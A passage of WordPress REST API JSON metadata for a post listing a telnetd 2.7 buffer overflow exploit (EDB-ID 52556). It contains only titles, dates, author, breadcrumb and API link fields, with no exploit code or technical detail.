Overflow_EDB-ID:52556","datePublished":"2026-05-07T10:34:46+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=52111"},"wordCount":3042,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=52111#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=52111","url":"https:\/\/zero.redgem.net\/?p=52111","name":"telnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-07T10:34:46+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=52111#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=52111"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=52111#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"telnetd 2.7 – Buffer Overflow_EDB-ID:52556"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=52111"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52111\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=52111"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=52111"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=52111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}